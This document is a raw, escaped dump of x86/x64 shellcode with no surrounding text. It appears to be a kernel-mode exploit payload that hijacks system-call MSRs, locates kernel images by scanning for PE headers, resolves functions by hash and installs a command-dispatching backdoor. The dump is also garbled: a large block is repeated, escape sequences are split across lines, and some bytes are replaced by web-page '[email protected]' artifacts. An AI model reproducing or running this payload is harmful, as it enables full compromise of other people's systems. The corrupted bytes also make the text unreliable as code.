\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
